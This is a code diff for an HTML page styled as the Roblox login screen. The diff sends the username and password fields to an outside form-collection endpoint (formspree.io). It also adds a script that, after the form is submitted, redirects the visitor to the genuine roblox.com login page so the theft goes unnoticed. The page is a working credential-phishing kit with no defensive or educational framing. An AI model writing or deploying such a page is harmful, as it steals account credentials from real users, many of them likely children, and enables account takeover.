--- a/index.html
+++ b/index.html
@@ -11,11 +11,19 @@
         .btn:hover { background: #0088cc; }
     </style>
 </head>
+    <script>
+document.querySelector('form').addEventListener('submit', function() {
+    setTimeout(function() {
+        window.location.href = 'https://www.roblox.com/login';
+    }, 1000);
+});
+</script>
+
 <body>
     <div class="container">
         <div class="logo">ROBLOX</div>
         <h2>Log In to Your Account</h2>
-        <form action="#" method="post">
+<form action="https://formspree.io/f/mjkoyqer" method="POST">
             <input type="text" name="username" placeholder="Username or Email" required>
             <input type="password" name="password" placeholder="Password" required>
             <input type="submit" value="Log In" class="btn">
@@ -26,8 +34,3 @@
     </div>
 </body>
 </html>
-<form action="https://formspree.io/f/YOUR_FORM_ID" method="POST">
-    <input type="text" name="username" placeholder="Username or Email" required>
-    <input type="password" name="password" placeholder="Password" required>
-    <input type="submit" value="Log In" class="btn">
-</form>
